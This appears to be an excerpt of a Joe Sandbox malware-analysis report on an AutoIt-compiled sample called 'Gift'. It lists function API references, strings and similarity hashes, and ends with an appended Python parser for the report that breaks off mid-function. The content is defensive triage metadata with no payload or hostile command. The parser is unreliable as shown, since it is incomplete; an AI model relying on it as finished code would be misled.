                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: '
                                                                          • API String ID: 3850602802-1997036262
                                                                          • Opcode ID: 9454e4a6d8842bb70150aaea6b6c14bae713daf273f2b100ce6239fd7c246482
                                                                          • Instruction ID: d7067c0b70b39266500bdced947a1911cb8500bbfd7cc0dec66b771846e13bb3
                                                                          • Opcode Fuzzy Hash: 9454e4a6d8842bb70150aaea6b6c14bae713daf273f2b100ce6239fd7c246482
                                                                          • Instruction Fuzzy Hash: 54412A74A016099FDB15CF68C881FDA7BB9FB08301F10006AED04EB391DB71AA56CF90
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00342C6A
                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00342CA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CrackInternet_memset
                                                                          • String ID: |
                                                                          • API String ID: 1413715105-2343686810
                                                                          • Opcode ID: 7bbe43c6bd7b017163762c61358ed32aec115c556cb6bcade4d9cc7e16bd5666
                                                                          • Instruction ID: 6bcc21475647566a2b8888f2a41d1096fc6ddb4a91685b502dc281b5dbb7489a
                                                                          • Opcode Fuzzy Hash: 7bbe43c6bd7b017163762c61358ed32aec115c556cb6bcade4d9cc7e16bd5666
                                                                          • Instruction Fuzzy Hash: 1E313B71C10119ABCF01EFA1CC85AEEBFB9FF09340F500069F925AA162DB315966DFA0
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 0035713C
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00357178
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$DestroyMove
                                                                          • String ID: static
                                                                          • API String ID: 2139405536-2160076837
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003330B8
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003330F3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          APIs
                                                                          • __snwprintf.LIBCMT ref: 00344132
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __snwprintf_memmove
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                          • API String ID: 3506404897-2584243854
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00356D86
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00356D91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Combobox
                                                                          • API String ID: 3850602802-2096851135
                                                                          APIs
                                                                            • Part of subcall function 002D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                            • Part of subcall function 002D2111: GetStockObject.GDI32(00000011), ref: 002D2163
                                                                            • Part of subcall function 002D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00357296
                                                                          • GetSysColor.USER32(00000012), ref: 003572B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                          • String ID: static
                                                                          • API String ID: 1983116058-2160076837
                                                                          APIs
                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00356FC7
                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00356FD6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LengthMessageSendTextWindow
                                                                          • String ID: edit
                                                                          • API String ID: 2978978980-2167791130
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 003331C9
                                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003331E8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu_memset
                                                                          • String ID: 0
                                                                          • API String ID: 2223754486-4108050209
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 002D351D
                                                                          • DestroyWindow.USER32(?,?,002E4E61), ref: 002D3576
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObjectWindow
                                                                          • String ID: h6
                                                                          • API String ID: 2587070983-2818403674
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003428F8
                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00342921
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$OpenOption
                                                                          • String ID: <local>
                                                                          • API String ID: 942729171-4266983199
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscmp
                                                                          • String ID: 0.0.0.0$L,6
                                                                          • API String ID: 856254489-1141617229
                                                                          APIs
                                                                            • Part of subcall function 003486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0034849D,?,00000000,?,?), ref: 003486F7
                                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • htons.WSOCK32(00000000,?,00000000), ref: 003484DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 2496851823-2422070025
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00329A2B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 636d4e99a33840a0f5009150e2754aeb11c0f35179460534eddf472093cd3e2f
                                                                          • Instruction ID: 0c1752a6ec38a340abb4145fd3620a5de880d0382d9f6a4906dc954f71b72fb3
                                                                          • Opcode Fuzzy Hash: 636d4e99a33840a0f5009150e2754aeb11c0f35179460534eddf472093cd3e2f
                                                                          • Instruction Fuzzy Hash: 7601F571A91224AB8B15EBA4CC52DFEB369EF56320F50062AF871973C1DA305828CA60
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DBC07
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _wcscat.LIBCMT ref: 00313593
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                          • String ID: s9
                                                                          • API String ID: 257928180-3206952609
                                                                          • Opcode ID: c190ff2c8513a77c191c7836897ccad8e566533fc23f11ca39ad16bf9c9a7b8e
                                                                          • Instruction ID: e408cce7823d70329ff8df73501ccaa398c11d9fe2999d148636b5b48e8cf572
                                                                          • Opcode Fuzzy Hash: c190ff2c8513a77c191c7836897ccad8e566533fc23f11ca39ad16bf9c9a7b8e
                                                                          • Instruction Fuzzy Hash: 701182359342089BCB06EBA49892EDE77A8FF08350B1141A7B94997390DF709BA49B51
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: 3b7e9138066ad51416cdab52d0b3a14feb0c3c7b837b0186bdbf87a167f6e596
                                                                          • Instruction ID: cf933b07ff78a088ee1af43d228a0bef966b6d5cff81ecc57c457274b124bb62
                                                                          • Opcode Fuzzy Hash: 3b7e9138066ad51416cdab52d0b3a14feb0c3c7b837b0186bdbf87a167f6e596
                                                                          • Instruction Fuzzy Hash: 4701F97280425CBEDB19C6A8CC56FFEBBFC9F01351F00429FF652D2181E5B5A6188B60
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00329923
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: 8307f1ac277200086771bd79bd53d5d5f31e2fd179d29b65db63d838abd606ee
                                                                          • Instruction ID: 13d3d8c692ba1f1d5374ddcbdd82bff59a4acded2300985c2ddcc4486221c5ea
                                                                          • Opcode Fuzzy Hash: 8307f1ac277200086771bd79bd53d5d5f31e2fd179d29b65db63d838abd606ee
                                                                          • Instruction Fuzzy Hash: 15012B71E911146BCB15FBA0D962FFFB3ACDF15300F50002AF851A3281DB205E28DAB2
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                            • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 003299A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassMessageNameSend_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 372448540-1403004172
                                                                          • Opcode ID: e8bbb48a255f86ecd028876982add9a2c745f25f9bda20c01a78a23e5fda2b7b
                                                                          • Instruction ID: a08e26b6e6fa0b57371c8a01a3144d1af859af92e733ea936a039b15b1b8c324
                                                                          • Opcode Fuzzy Hash: e8bbb48a255f86ecd028876982add9a2c745f25f9bda20c01a78a23e5fda2b7b
                                                                          • Instruction Fuzzy Hash: 5601DBB2A9111467DB16EBA4D952FFFB3AC9F11350F50002AB855A3281DB244E689672
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __calloc_crt
                                                                          • String ID: @b9
                                                                          • API String ID: 3494438863-2266355199
                                                                          • Opcode ID: bfd717402d1dc87dc642aff34ffe385f6efdf91fa07baef127a1c557709d84f6
                                                                          • Instruction ID: 81d82d09a29f083956329cf72a9878401b38c1f129895bef9ee878308de86ca3
                                                                          • Opcode Fuzzy Hash: bfd717402d1dc87dc642aff34ffe385f6efdf91fa07baef127a1c557709d84f6
                                                                          • Instruction Fuzzy Hash: E0F04F7233821B9BFB298F58BD456B1A799E7147A0F100977F344DA2D4E77188914A80
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName_wcscmp
                                                                          • String ID: #32770
                                                                          • API String ID: 2292705959-463685578
                                                                          • Opcode ID: d242b318d0f9f3908c4c15f0e18cd022465a16804888f8f2e5ae3d44992a1990
                                                                          • Instruction ID: 10c7ec40761c04dac59e810cda6afed9872c80db95967632edade2900889f956
                                                                          • Opcode Fuzzy Hash: d242b318d0f9f3908c4c15f0e18cd022465a16804888f8f2e5ae3d44992a1990
                                                                          • Instruction Fuzzy Hash: 24E09B7250022D17D711A659AC45AA7F7ACDB56761F010057F904D6051D560E95587E0
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003288A0
                                                                            • Part of subcall function 002F3588: _doexit.LIBCMT ref: 002F3592
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: 9ab273554be11fa18c57c5678339cfcbd471bc004f65c49fc44ad616c8e6a7c4
                                                                          • Instruction ID: ef3633935704568fd8f05b0181cc66d28a8d01374288976e4050677f9e2939db
                                                                          • Opcode Fuzzy Hash: 9ab273554be11fa18c57c5678339cfcbd471bc004f65c49fc44ad616c8e6a7c4
                                                                          • Instruction Fuzzy Hash: CDD05B3239535C36D21672A56C0BFDB7A4C8B05B91F40443AFB08651D38DD585B046D5
                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 00310091
                                                                            • Part of subcall function 0034C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0031027A,?), ref: 0034C6E7
                                                                            • Part of subcall function 0034C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C6F9
                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00310289
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                          • String ID: WIN_XPe
                                                                          • API String ID: 582185067-3257408948
                                                                          • Opcode ID: 8833ea282882201ffb637917f5ca70dbf054259df1e1332e8baf46d16761fc53
                                                                          • Instruction ID: ef29721dba207c531393ce82621f12a5469fb2846ea72cb2acf7512d5f19cdf7
                                                                          • Opcode Fuzzy Hash: 8833ea282882201ffb637917f5ca70dbf054259df1e1332e8baf46d16761fc53
                                                                          • Instruction Fuzzy Hash: 32F01570815109DFCB1EDBA0C998BEDBABCAB0C300F245486E18AB6190CBB54EC4CF21
                                                                          APIs
                                                                          • DestroyIcon.USER32(,z90z9,00397A2C,00397890,?,002E5A53,00397A2C,00397A30,?,00000004), ref: 002E5823
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyIcon
                                                                          • String ID: ,z90z9$SZ.,z90z9
                                                                          • API String ID: 1234817797-348785591
                                                                          • Opcode ID: 24244c9bd432ff4c480e88218e2822719b19737f2a8d814a950eae48dd2bb4cd
                                                                          • Instruction ID: 6ca25837b17493f7fc2edc94b584a15efa0c0652408ef51e2c1b59e5894a393d
                                                                          • Opcode Fuzzy Hash: 24244c9bd432ff4c480e88218e2822719b19737f2a8d814a950eae48dd2bb4cd
                                                                          • Instruction Fuzzy Hash: 0CE0C2320342A7EBE7214F0AD800795FBECAF21321FA48416E08046050D3F168F0CBA0
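The entries above are the Joe Sandbox IDA plugin's per-function similarity records: a list of direct and subcall API references, the `$`-separated strings the function touches, and the API / String / Opcode identifiers used to match the function against other samples. When triaging many reports of the same AutoIt-packed family it is useful to turn this text into structured data, so that functions can be grouped by `API String ID` and the raw `SendMessageW` message constants (here `00000180`, `00000182`, `000001A2`, all list-box messages) can be read as names. The parser below is an added example, not part of the Joe Sandbox report; the sample input is three entries copied from this page and reduced to the lines the parser consumes (the Memory Dump Source lines are identical for every entry and carry no per-function information). The `LB_*` values are the public winuser.h constants; the subcall flag marks references the plugin attributes to a callee rather than to the function itself.

```python
import re
from collections import defaultdict

# Constructed sample input: three entries from the report, trimmed to the
# API, String and Similarity lines. Bullets are kept as extracted.
SAMPLE = """\
APIs
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
  • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00329A2B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 636d4e99a33840a0f5009150e2754aeb11c0f35179460534eddf472093cd3e2f
• Instruction Fuzzy Hash: 7601F571A91224AB8B15EBA4CC52DFEB369EF56320F50062AF871973C1DA305828CA60
APIs
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
  • Part of subcall function 0032B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0032B7BD
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00329923
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 8307f1ac277200086771bd79bd53d5d5f31e2fd179d29b65db63d838abd606ee
• Instruction Fuzzy Hash: 15012B71E911146BCB15FBA0D962FFFB3ACDF15300F50002AF851A3281DB205E28DAB2
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003288A0
  • Part of subcall function 002F3588: _doexit.LIBCMT ref: 002F3592
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 9ab273554be11fa18c57c5678339cfcbd471bc004f65c49fc44ad616c8e6a7c4
• Instruction Fuzzy Hash: CDD05B3239535C36D21672A56C0BFDB7A4C8B05B91F40443AFB08651D38DD585B046D5
"""

FIELD_RE = re.compile(
    r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|Instruction Fuzzy Hash):\s*(\S.*)$")
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")

# List-box window messages seen in the entries above (winuser.h constants).
LB_MESSAGES = {0x180: "LB_ADDSTRING", 0x182: "LB_DELETESTRING", 0x1A2: "LB_FINDSTRINGEXACT"}


def parse_entries(text):
    """Split report text into one dict per function entry."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # every entry opens with its API list
            cur = {"apis": []}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            cur[m.group(1)] = m.group(2)
            continue
        m = CALL_RE.match(line)
        if m:
            args = m.group("args")
            cur["apis"].append({
                "func": m.group("func"), "module": m.group("mod"),
                "args": args.split(",") if args is not None else [],
                "ref": int(m.group("ref"), 16),
                "subcall": m.group("sub") is not None,   # attributed to a callee, not this function
            })
    for e in entries:
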